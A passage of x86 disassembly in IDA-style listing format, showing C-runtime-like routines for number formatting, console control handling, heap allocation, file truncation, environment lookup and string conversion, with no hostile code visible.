mov [ecx], al
jnz short loc_420122
mov eax, [ebp+arg_14]
loc_42016F: ; CODE XREF: sub_41FF41+1DC�j
mov cl, [eax-1]
dec eax
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_4201AC
loc_42017C: ; CODE XREF: sub_41FF41+248�j
cmp eax, ecx
jb short loc_42018F
cmp byte ptr [eax], 39h
jnz short loc_42018B
mov byte ptr [eax], 30h
dec eax
jmp short loc_42017C
; ---------------------------------------------------------------------------
loc_42018B: ; CODE XREF: sub_41FF41+242�j
cmp eax, ecx
jnb short loc_420193
loc_42018F: ; CODE XREF: sub_41FF41+23D�j
inc eax
inc word ptr [ebx]
loc_420193: ; CODE XREF: sub_41FF41+24C�j
inc byte ptr [eax]
loc_420195: ; CODE XREF: sub_41FF41+279�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_4201A4: ; CODE XREF: sub_41FF41+F0�j
mov eax, [ebp+var_4]
loc_4201A7: ; CODE XREF: sub_41FF41+291�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4201AC: ; CODE XREF: sub_41FF41+239�j
; sub_41FF41+275�j
cmp eax, ecx
jb short loc_4201BC
cmp byte ptr [eax], 30h
jnz short loc_4201B8
dec eax
jmp short loc_4201AC
; ---------------------------------------------------------------------------
loc_4201B8: ; CODE XREF: sub_41FF41+272�j
cmp eax, ecx
jnb short loc_420195
loc_4201BC: ; CODE XREF: sub_41FF41+26D�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ecx], 30h
loc_4201CB: ; CODE XREF: sub_41FF41+87�j
and byte ptr [ebx+5], 0
push 1
pop eax
jmp short loc_4201A7
sub_41FF41 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+0Ch]
cmp edi, 4
jz loc_42029E
cmp edi, 3
jz loc_42029E
mov esi, [ebp+8]
cmp esi, 2
jz short loc_420254
cmp esi, 15h
jz short loc_420254
cmp esi, 16h
jz short loc_42024F
cmp esi, 0Fh
jz short loc_42024F
cmp esi, 8
jz short loc_420218
cmp esi, 4
jz short loc_420218
cmp esi, 0Bh
jnz loc_42029E
loc_420218: ; CODE XREF: .text:00420208�j
; .text:0042020D�j
push esi
call sub_420445
test eax, eax
pop ecx
jz short loc_42029E
mov ecx, [eax+8]
loc_420226: ; CODE XREF: .text:0042024D�j
cmp [eax+4], esi
jnz loc_4202DC
mov [eax+8], edi
mov edx, dword_436128
add eax, 0Ch
lea edx, [edx+edx*2]
lea edx, ds:4360A8h[edx*4]
cmp eax, edx
jnb loc_4202DC
jmp short loc_420226
; ---------------------------------------------------------------------------
loc_42024F: ; CODE XREF: .text:004201FE�j
; .text:00420203�j
cmp esi, 15h
jnz short loc_420274
loc_420254: ; CODE XREF: .text:004201F4�j
; .text:004201F9�j
cmp dword_492AD0, 0
jnz short loc_420274
push 1
push offset loc_4202E0
call ds:dword_4952F4 ; SetConsoleCtrlHandler
cmp eax, 1
jnz short loc_420293
mov dword_492AD0, eax
loc_420274: ; CODE XREF: .text:00420252�j
; .text:0042025B�j
dec esi
dec esi
jz short loc_4202CB
sub esi, 0Dh
jz short loc_4202BD
sub esi, 6
jz short loc_4202AF
dec esi
jnz short loc_4202D9
mov ecx, dword_492AC8
mov dword_492AC8, edi
jmp short loc_4202DC
; ---------------------------------------------------------------------------
loc_420293: ; CODE XREF: .text:0042026D�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_4927F8, eax
loc_42029E: ; CODE XREF: .text:004201DF�j
; .text:004201E8�j ...
mov dword_4927F4, 16h
or eax, 0FFFFFFFFh
loc_4202AB: ; CODE XREF: .text:004202DE�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4202AF: ; CODE XREF: .text:00420280�j
mov ecx, dword_492AC4
mov dword_492AC4, edi
jmp short loc_4202DC
; ---------------------------------------------------------------------------
loc_4202BD: ; CODE XREF: .text:0042027B�j
mov ecx, dword_492ACC
mov dword_492ACC, edi
jmp short loc_4202DC
; ---------------------------------------------------------------------------
loc_4202CB: ; CODE XREF: .text:00420276�j
mov ecx, dword_492AC0
mov dword_492AC0, edi
jmp short loc_4202DC
; ---------------------------------------------------------------------------
loc_4202D9: ; CODE XREF: .text:00420283�j
mov ecx, [ebp+0Ch]
loc_4202DC: ; CODE XREF: .text:00420229�j
; .text:00420247�j ...
mov eax, ecx
jmp short loc_4202AB
; ---------------------------------------------------------------------------
loc_4202E0: ; DATA XREF: .text:0042025F�o
cmp dword ptr [esp+4], 0
jnz short loc_4202F5
mov eax, dword_492AC0
mov ecx, offset dword_492AC0
push 2
jmp short loc_420301
; ---------------------------------------------------------------------------
loc_4202F5: ; CODE XREF: .text:004202E5�j
mov eax, dword_492AC4
mov ecx, offset dword_492AC4
push 15h
loc_420301: ; CODE XREF: .text:004202F3�j
test eax, eax
pop edx
jz short locret_420315
cmp eax, 1
jz short loc_420312
and dword ptr [ecx], 0
push edx
call eax
pop ecx
loc_420312: ; CODE XREF: .text:00420309�j
push 1
pop eax
locret_420315: ; CODE XREF: .text:00420304�j
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420318 proc near ; CODE XREF: sub_41A91C+3AA7�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_42037F
dec eax
dec eax
jz short loc_420370
sub eax, 4
jz short loc_420370
sub eax, 3
jz short loc_420370
sub eax, 4
jz short loc_420363
sub eax, 6
jz short loc_420356
dec eax
jz short loc_420349
or eax, 0FFFFFFFFh
jmp loc_420441
; ---------------------------------------------------------------------------
loc_420349: ; CODE XREF: sub_420318+27�j
mov esi, dword_492AC8
mov eax, offset dword_492AC8
jmp short loc_42038A
; ---------------------------------------------------------------------------
loc_420356: ; CODE XREF: sub_420318+24�j
mov esi, dword_492AC4
mov eax, offset dword_492AC4
jmp short loc_42038A
; ---------------------------------------------------------------------------
loc_420363: ; CODE XREF: sub_420318+1F�j
mov esi, dword_492ACC
mov eax, offset dword_492ACC
jmp short loc_42038A
; ---------------------------------------------------------------------------
loc_420370: ; CODE XREF: sub_420318+10�j
; sub_420318+15�j ...
push edi
call sub_420445
mov esi, [eax+8]
add eax, 8
pop ecx
jmp short loc_42038A
; ---------------------------------------------------------------------------
loc_42037F: ; CODE XREF: sub_420318+C�j
mov esi, dword_492AC0
mov eax, offset dword_492AC0
loc_42038A: ; CODE XREF: sub_420318+3C�j
; sub_420318+49�j ...
cmp esi, 1
jnz short loc_420396
xor eax, eax
jmp loc_420441
; ---------------------------------------------------------------------------
loc_420396: ; CODE XREF: sub_420318+75�j
test esi, esi
jnz short loc_4203A1
push 3
call sub_41781E
loc_4203A1: ; CODE XREF: sub_420318+80�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_4203B3
cmp edi, 0Bh
jz short loc_4203B3
cmp edi, 4
jnz short loc_4203D9
loc_4203B3: ; CODE XREF: sub_420318+8F�j
; sub_420318+94�j
mov ebx, dword_4928A4
and dword_4928A4, 0
cmp edi, ecx
jnz short loc_420408
mov edx, dword_43612C
mov dword_43612C, 8Ch
mov [ebp+arg_0], edx
jmp short loc_4203DC
; ---------------------------------------------------------------------------
loc_4203D9: ; CODE XREF: sub_420318+99�j
mov ebx, [ebp+arg_0]
loc_4203DC: ; CODE XREF: sub_420318+BF�j
cmp edi, ecx
jnz short loc_420408
mov eax, dword_436120
mov ecx, dword_436124
add ecx, eax
cmp eax, ecx
jge short loc_42040F
lea edx, [eax+eax*2]
sub ecx, eax
lea edx, ds:4360B0h[edx*4]
loc_4203FD: ; CODE XREF: sub_420318+EC�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_4203FD
jmp short loc_42040F
; ---------------------------------------------------------------------------
loc_420408: ; CODE XREF: sub_420318+AA�j
; sub_420318+C6�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_42041D
loc_42040F: ; CODE XREF: sub_420318+D7�j
; sub_420318+EE�j
push dword_43612C
push 8
call esi
pop ecx
pop ecx
jmp short loc_42042B
; ---------------------------------------------------------------------------
loc_42041D: ; CODE XREF: sub_420318+F5�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_42042B
cmp edi, 4
jnz short loc_42043E
loc_42042B: ; CODE XREF: sub_420318+103�j
; sub_420318+10C�j
cmp edi, 8
mov dword_4928A4, ebx
jnz short loc_42043E
mov eax, [ebp+arg_0]
mov dword_43612C, eax
loc_42043E: ; CODE XREF: sub_420318+111�j
; sub_420318+11C�j
xor eax, eax
pop ebx
loc_420441: ; CODE XREF: sub_420318+2C�j
; sub_420318+79�j
pop edi
pop esi
pop ebp
retn
sub_420318 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_420445 proc near ; CODE XREF: .text:00420219�p
; sub_420318+59�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_436128
cmp dword_4360AC, edx
push esi
mov eax, offset dword_4360A8
jz short loc_420473
lea esi, [ecx+ecx*2]
lea esi, ds:4360A8h[esi*4]
loc_420467: ; CODE XREF: sub_420445+2C�j
add eax, 0Ch
cmp eax, esi
jnb short loc_420473
cmp [eax+4], edx
jnz short loc_420467
loc_420473: ; CODE XREF: sub_420445+16�j
; sub_420445+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:4360A8h[ecx*4]
cmp eax, ecx
jnb short loc_420487
cmp [eax+4], edx
jz short locret_420489
loc_420487: ; CODE XREF: sub_420445+3B�j
xor eax, eax
locret_420489: ; CODE XREF: sub_420445+40�j
retn
sub_420445 endp
; =============== S U B R O U T I N E =======================================
sub_42048A proc near ; CODE XREF: sub_41E5E8+22�p
; sub_41E5E8+3B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
imul esi, [esp+0Ch+arg_4]
cmp esi, 0FFFFFFE0h
mov ebx, esi
ja short loc_4204AA
test esi, esi
jnz short loc_4204A4
push 1
pop esi
loc_4204A4: ; CODE XREF: sub_42048A+15�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_4204AA: ; CODE XREF: sub_42048A+11�j
; sub_42048A+65�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_4204DB
cmp ebx, dword_435AC8
ja short loc_4204C6
push ebx
call sub_41866D
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4204F1
loc_4204C6: ; CODE XREF: sub_42048A+2D�j
push esi
push 8
push dword_49426C
call ds:dword_495428 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_4204FD
loc_4204DB: ; CODE XREF: sub_42048A+25�j
cmp dword_49284C, 0
jz short loc_4204FD
push esi
call sub_4181F0
test eax, eax
pop ecx
jz short loc_420503
jmp short loc_4204AA
; ---------------------------------------------------------------------------
loc_4204F1: ; CODE XREF: sub_42048A+3A�j
push ebx
push 0
push edi
call sub_415CA0
add esp, 0Ch
loc_4204FD: ; CODE XREF: sub_42048A+4F�j
; sub_42048A+58�j
mov eax, edi
loc_4204FF: ; CODE XREF: sub_42048A+7B�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_420503: ; CODE XREF: sub_42048A+63�j
xor eax, eax
jmp short loc_4204FF
sub_42048A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E68D
loc_420507: ; CODE XREF: sub_41E68D+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp dword_493E40, esi
jle short loc_42055A
loc_420516: ; CODE XREF: sub_41E68D+1ECB�j
mov eax, dword_492AF0
mov eax, [eax+esi*4]
test eax, eax
jz short loc_420551
test byte ptr [eax+0Ch], 83h
jz short loc_420535
push eax
call sub_416D94
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_420535
inc edi
loc_420535: ; CODE XREF: sub_41E68D+1E99�j
; sub_41E68D+1EA5�j
cmp esi, 14h
jl short loc_420551
mov eax, dword_492AF0
push dword ptr [eax+esi*4]
call sub_415D6C
mov eax, dword_492AF0
pop ecx
and dword ptr [eax+esi*4], 0
loc_420551: ; CODE XREF: sub_41E68D+1E93�j
; sub_41E68D+1EAB�j
inc esi
cmp esi, dword_493E40
jl short loc_420516
loc_42055A: ; CODE XREF: sub_41E68D+1E87�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_41E68D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42055F proc near ; CODE XREF: sub_41EEE4+271�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_416880
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, dword_493F9C
jnb loc_420694
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_493E60[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_420694
push 1
push esi
push ebx
call sub_41CE78
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_42069E
push 2
push esi
push ebx
call sub_41CE78
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_42069E
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_420641
push 1000h
lea eax, [ebp+var_1000]
push esi
push eax
call sub_415CA0
push 8000h
push ebx
call sub_4209BE
add esp, 14h
mov [ebp+arg_4], eax
loc_4205F5: ; CODE XREF: sub_42055F+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_420600
mov eax, edi
loc_420600: ; CODE XREF: sub_42055F+9D�j
push eax
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_41E3D1
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_42061E
sub edi, eax
test edi, edi
jle short loc_420634
jmp short loc_4205F5
; ---------------------------------------------------------------------------
loc_42061E: ; CODE XREF: sub_42055F+B5�j
cmp dword_4927F8, 5
jnz short loc_420631
mov dword_4927F4, 0Dh
loc_420631: ; CODE XREF: sub_42055F+C6�j
or esi, 0FFFFFFFFh
loc_420634: ; CODE XREF: sub_42055F+BB�j
push [ebp+arg_4]
push ebx
call sub_4209BE
pop ecx
pop ecx
jmp short loc_420681
; ---------------------------------------------------------------------------
loc_420641: ; CODE XREF: sub_42055F+71�j
jge short loc_420681
push 0
push [ebp+arg_4]
push ebx
call sub_41CE78
push ebx
call sub_41ED9C
add esp, 10h
push eax
call ds:dword_4952F0 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_420681
mov dword_4927F4, 0Dh
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_4927F8, eax
loc_420681: ; CODE XREF: sub_42055F+E0�j
; sub_42055F:loc_420641�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_41CE78
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_4206A1
; ---------------------------------------------------------------------------
loc_420694: ; CODE XREF: sub_42055F+1A�j
; sub_42055F+36�j
mov dword_4927F4, 9
loc_42069E: ; CODE XREF: sub_42055F+4E�j
; sub_42055F+63�j
or eax, 0FFFFFFFFh
loc_4206A1: ; CODE XREF: sub_42055F+133�j
pop esi
pop ebx
leave
retn
sub_42055F endp
; =============== S U B R O U T I N E =======================================
sub_4206A5 proc near ; CODE XREF: sub_41F1B2+23�p
arg_0 = dword ptr 4
cmp dword_494284, 0
push ebx
push esi
mov esi, dword_49281C
push edi
jz short loc_42071C
test esi, esi
jnz short loc_4206D6
cmp dword_492824, esi
jz short loc_42071C
call sub_420A73
test eax, eax
jnz short loc_42071C
mov esi, dword_49281C
test esi, esi
jz short loc_42071C
loc_4206D6: ; CODE XREF: sub_4206A5+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_42071C
push ebx
call sub_4158E0
pop ecx
mov edi, eax
loc_4206E7: ; CODE XREF: sub_4206A5+6D�j
mov eax, [esi]
test eax, eax
jz short loc_42071C
push eax
call sub_4158E0
cmp eax, edi
pop ecx
jbe short loc_42070F
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_42070F
push edi
push ebx
push eax
call sub_420A34
add esp, 0Ch
test eax, eax
jz short loc_420714
loc_42070F: ; CODE XREF: sub_4206A5+51�j
; sub_4206A5+59�j
add esi, 4
jmp short loc_4206E7
; ---------------------------------------------------------------------------
loc_420714: ; CODE XREF: sub_4206A5+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_42071E
; ---------------------------------------------------------------------------
loc_42071C: ; CODE XREF: sub_4206A5+10�j
; sub_4206A5+1C�j ...
xor eax, eax
loc_42071E: ; CODE XREF: sub_4206A5+75�j
pop edi
pop esi
pop ebx
retn
sub_4206A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420722 proc near ; CODE XREF: sub_41FF41+165�p
; sub_420942+69�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov cx, [ebx+0Ah]
xor eax, eax
push edi
mov [ebp+var_14], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov ax, [esi+0Ah]
mov edi, ecx
mov edx, 7FFFh
xor edi, eax
and eax, edx
and ecx, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_420922
cmp cx, 7FFFh
jnb loc_420922
cmp dx, 0BFFDh
ja loc_420922
cmp dx, 3FBFh
ja short loc_42078B
xor eax, eax
jmp short loc_4207C5
; ---------------------------------------------------------------------------
loc_42078B: ; CODE XREF: sub_420722+63�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_4207AD
inc [ebp+arg_0]
test [esi+8], edx
jnz short loc_4207AD
xor eax, eax
cmp [esi+4], eax
jnz short loc_4207AF
cmp [esi], eax
jnz short loc_4207AF
jmp loc_42091C
; ---------------------------------------------------------------------------
loc_4207AD: ; CODE XREF: sub_420722+71�j
; sub_420722+79�j
xor eax, eax
loc_4207AF: ; CODE XREF: sub_420722+80�j
; sub_420722+84�j
cmp cx, ax
jnz short loc_4207D2
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_4207D2
cmp [ebx+4], eax
jnz short loc_4207D2
cmp [ebx], eax
jnz short loc_4207D2
loc_4207C5: ; CODE XREF: sub_420722+67�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_42093D
; ---------------------------------------------------------------------------
loc_4207D2: ; CODE XREF: sub_420722+90�j
; sub_420722+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_4207E2: ; CODE XREF: sub_420722+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_420836
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_4207FE: ; CODE XREF: sub_420722+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_41F893
add esp, 0Ch
test eax, eax
jz short loc_420829
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_420829: ; CODE XREF: sub_420722+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_4207FE
loc_420836: ; CODE XREF: sub_420722+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_4207E2
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_420879
loc_420854: ; CODE XREF: sub_420722+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_420872
lea eax, [ebp+var_24]
push eax
call sub_41F912
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_420854
loc_420872: ; CODE XREF: sub_420722+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_4208B2
loc_420879: ; CODE XREF: sub_420722+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_4208B2
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_420892: ; CODE XREF: sub_420722+184�j
test byte ptr [ebp+var_24], 1
jz short loc_42089B
inc [ebp+var_14]
loc_42089B: ; CODE XREF: sub_420722+174�j
lea eax, [ebp+var_24]
push eax
call sub_41F940
dec ebx
pop ecx
jnz short loc_420892
cmp [ebp+var_14], 0
jz short loc_4208B2
or byte ptr [ebp+var_24], 1
loc_4208B2: ; CODE XREF: sub_420722+155�j
; sub_420722+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_4208C9
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_4208FE
loc_4208C9: ; CODE XREF: sub_420722+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_4208FB
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_4208F6
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_4208F0
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_4208FE
; ---------------------------------------------------------------------------
loc_4208F0: ; CODE XREF: sub_420722+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_4208FE
; ---------------------------------------------------------------------------
loc_4208F6: ; CODE XREF: sub_420722+1B5�j
inc [ebp+var_20+2]
jmp short loc_4208FE
; ---------------------------------------------------------------------------
loc_4208FB: ; CODE XREF: sub_420722+1AB�j
inc [ebp+var_24+2]
loc_4208FE: ; CODE XREF: sub_420722+1A5�j
; sub_420722+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_420922
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_42091C: ; CODE XREF: sub_420722+86�j
mov [esi+0Ah], ax
jmp short loc_42093D
; ---------------------------------------------------------------------------
loc_420922: ; CODE XREF: sub_420722+42�j
; sub_420722+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_42093D: ; CODE XREF: sub_420722+AB�j
; sub_420722+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_420722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420942 proc near ; CODE XREF: sub_41FA34+440�p
; sub_41FF41+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_4365A0
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_4209BB
jge short loc_42096A
mov eax, [ebp+arg_4]
mov ebx, offset dword_436700
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_42096A: ; CODE XREF: sub_420942+16�j
cmp [ebp+arg_8], ecx
jnz short loc_420975
mov eax, [ebp+arg_0]
mov [eax], cx
loc_420975: ; CODE XREF: sub_420942+2B�j
cmp [ebp+arg_4], ecx
jz short loc_4209BB
push esi
push edi
loc_42097C: ; CODE XREF: sub_420942+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_4209B4
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_4209A7
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_4209A7: ; CODE XREF: sub_420942+57�j
push esi
push [ebp+arg_0]
call sub_420722
pop ecx
pop ecx
xor ecx, ecx
loc_4209B4: ; CODE XREF: sub_420942+49�j
cmp [ebp+arg_4], ecx
jnz short loc_42097C
pop edi
pop esi
loc_4209BB: ; CODE XREF: sub_420942+14�j
; sub_420942+36�j
pop ebx
leave
retn
sub_420942 endp
; =============== S U B R O U T I N E =======================================
sub_4209BE proc near ; CODE XREF: sub_42055F+8B�p
; sub_42055F+D9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword_493F9C
jnb short loc_420A25
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_493E60[ecx*4]
lea edx, [ecx+eax*8+4]
mov cl, [ecx+eax*8+4]
test cl, 1
jz short loc_420A25
mov al, cl
mov esi, 8000h
and eax, 80h
cmp [esp+4+arg_4], esi
jnz short loc_4209FE
and cl, 7Fh
jmp short loc_420A0B
; ---------------------------------------------------------------------------
loc_4209FE: ; CODE XREF: sub_4209BE+39�j
cmp [esp+4+arg_4], 4000h
jnz short loc_420A19
or cl, 80h
loc_420A0B: ; CODE XREF: sub_4209BE+3E�j
neg eax
sbb eax, eax
mov [edx], cl
and ax, 0C000h
add eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_420A19: ; CODE XREF: sub_4209BE+48�j
mov dword_4927F4, 16h
jmp short loc_420A2F
; ---------------------------------------------------------------------------
loc_420A25: ; CODE XREF: sub_4209BE+B�j
; sub_4209BE+27�j
mov dword_4927F4, 9
loc_420A2F: ; CODE XREF: sub_4209BE+65�j
or eax, 0FFFFFFFFh
pop esi
retn
sub_4209BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420A34 proc near ; CODE XREF: sub_4206A5+5E�p
; sub_420F10+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_420A41
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420A41: ; CODE XREF: sub_420A34+7�j
push dword_493FA0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push dword_494244
call sub_420AE1
add esp, 1Ch
test eax, eax
jnz short loc_420A6E
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420A6E: ; CODE XREF: sub_420A34+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_420A34 endp
; =============== S U B R O U T I N E =======================================
sub_420A73 proc near ; CODE XREF: sub_4206A5+1E�p
; sub_420D89+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword_492824
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_420AD4
mov ebx, ds:dword_4953E8
loc_420A8C: ; CODE XREF: sub_420A73+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_420ADC
push ebp
call sub_415CF8
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_420ADC
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_420ADC
push edi
push [esp+18h+var_4]
call sub_420D89
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_420A8C
loc_420AD4: ; CODE XREF: sub_420A73+11�j
xor eax, eax
loc_420AD6: ; CODE XREF: sub_420A73+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_420ADC: ; CODE XREF: sub_420A73+29�j
; sub_420A73+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_420AD6
sub_420A73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420AE1 proc near ; CODE XREF: sub_420A34+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427BD0
push offset sub_41D854
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp dword_492AD8, ebx
push 1
pop edi
jnz short loc_420B54
push edi
mov eax, offset dword_427824
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_4952E8 ; CompareStringW
test eax, eax
jz short loc_420B31
